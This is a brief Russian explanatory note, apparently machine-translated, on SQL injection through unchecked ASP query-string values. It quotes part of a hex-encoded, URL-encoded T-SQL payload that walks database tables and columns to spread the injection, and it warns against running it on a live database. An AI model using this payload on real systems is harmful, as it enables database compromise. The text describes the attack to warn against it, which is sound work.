Злоумышленники не только взламывают SQL-запросы из форм, но также используют строку запросов или прошлый метод в ASP, их программное обеспечение может находить страницы, которые используют значения из Querystring. Злоумышленник добавляет свой сценарий в этот URL-адрес, и когда код страницы сайта веб-сайта получает значение из строки запроса, и нет проверки для проверки значения. Все скрипты передаются в базу данных для исполнения. Сценарий, используемый в URL, имеет шестнадцатеричный формат и будет в исполняемом формате, когда вы запустите этот оператор в запросе anaylser. Не запускайте этот сценарий в базе данных LIVE, для этого создайте фиктивную базу данных и затем выполните ее, иначе ваша база данных будет заражена.
Эти операторы создают ошибки, которые выбирают все таблицы базы данных, а затем все столбцы таблицы для распространения инъекции. + Объявить +% 40s + VARCHAR% 288000% 29 + набор +% 40s% 3Dcast% 280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f5343484
Подробная ссылка